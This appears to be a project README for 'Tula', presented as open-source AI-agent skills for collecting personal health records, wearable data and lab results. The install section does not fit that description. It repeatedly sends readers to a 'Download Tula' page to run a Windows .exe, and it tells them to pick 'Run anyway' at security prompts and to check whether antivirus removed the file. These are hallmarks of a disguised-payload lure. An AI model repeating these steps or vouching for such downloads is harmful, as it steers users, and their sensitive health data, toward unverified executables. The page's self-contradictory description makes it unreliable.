🩺 tula - Personal health data in one place

📥 Download Tula
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🔍 What Tula does
Tula is an open-source set of OpenClaw skills, settings, and patterns that helps turn a general AI agent into a personal health intelligence assistant.
It is built for people who want to bring health data into one place and work with it in a clearer way. Tula can help you organize and review data from sources like:
- Wearables
- Lab reports
- Genomics data
- EHR and FHIR records
- Medical imaging notes
- Patient data from other health tools
Tula is made to support health tracking, second opinions, and better patient awareness. It gives an AI agent more structure so it can handle health-related data with care.
🪟 Windows setup
This project is meant to be used on Windows as a local app or helper tool.
What you need
- Windows 10 or Windows 11
- A modern web browser
- Enough free disk space for the app and its data
- An internet connection for the first download and setup
Install steps
- Open the download page:
Download Tula
- Download the latest package or release file from that page.
- If the file comes as a .zip file, right-click it and choose Extract All.
- Open the extracted folder.
- If you see an .exe file, double-click it to start Tula.
- If Windows shows a security prompt, choose Run anyway only if you trust the source.
- Follow the on-screen steps inside the app.
- Keep the app folder in a place you can find again, such as Downloads or Desktop.
First run
When Tula starts for the first time, it may ask you to:
- Accept local data access
- Point to a folder with your health files
- Connect to a health data source
- Load sample data
- Choose the kind of records you want to review
🧭 What you can do with Tula
Tula is meant to help you make sense of health data. You can use it to:
- Review lab trends over time
- Compare notes from different visits
- Track signals from wearables
- Organize imaging reports
- Bring together records from different systems
- Support a second-opinion review
- Keep patient data easier to read
🧬 Supported health data
Tula works best when your data is in common health formats or close to them. It is built around:
- Biomarkers
- EHR data
- FHIR resources
- Genomics reports
- Oncology records
- Lab results
- Imaging summaries
- Wearable exports
- Patient safety notes
If your files come from a portal or device export, Tula can help you make them easier to review in one place.
🧱 Basic file use
Tula may use folders, local files, and structured records. A typical setup looks like this:
- One folder for imported records
- One folder for notes or exports
- One folder for charts or reports
- Optional subfolders for labs, imaging, and wearable data
If the app asks for a path, pick a folder you can access again later.
🔒 Privacy and local use
Health data needs care. Tula is built for personal use, so you should keep your files in folders you control.
Good habits:
- Use a device only you can access
- Keep backups of your files
- Review what data you import
- Remove old data you no longer need
- Store files in a private account
🛠️ Troubleshooting
The app does not open
- Check that the download finished
- Make sure you extracted the full zip file
- Try running the app again
- Restart Windows and try once more
Windows blocks the app
- Right-click the file and look for an option to run it
- Check whether your antivirus tool moved the file
- Download the file again from the project page
The app opens but shows no data
- Confirm that you selected the right folder
- Check that your files are in a supported format
- Try a sample file first
- Make sure the folder still exists
The app cannot read a file
- Rename the file to a simple name
- Move it to a local folder on your PC
- Check that the file is not damaged
- Try another export from the source system
📁 Example use cases
Lab review
Import lab results and compare values across dates. This can help you spot shifts in markers like cholesterol, glucose, or inflammation signals.
Wearable tracking
Bring in step counts, heart rate, sleep data, or activity logs from a wearable export and review them with health notes.
Record review
Load visit summaries, discharge notes, and FHIR exports to get a cleaner view of your health history.
Second opinion support
Use Tula to collect records before a specialist visit so you can share a more complete view of your data.
🧩 Project topics
This repository includes work related to:
- ai-agent
- biomarkers
- ehr
- fhir
- genomics
- health
- healthcare
- labs
- medical-imaging
- oncology
- openclaw
- openclaw-skills
- patient-data
- patient-empowerment
- patient-safety
- second-opinion
- wearables
📌 How to get started fast
If you want the shortest path:
- Go to Download Tula
- Download the latest file
- Extract it if needed
- Open the app on Windows
- Load your health files or sample data
- Start reviewing your records
🗂️ Suggested folder setup
You can keep things simple with a folder layout like this:
Tula
Imports
Labs
Imaging
Wearables
Notes
Exports
This makes it easier to find files later and keep your records in one place
🖥️ Running tips
- Keep the app in a stable folder
- Use clear file names
- Update the app when a new release appears
- Keep a backup of any important records
- Close other heavy apps if Tula feels slow
📎 Download again
If you need the file again, use this page:
Download Tula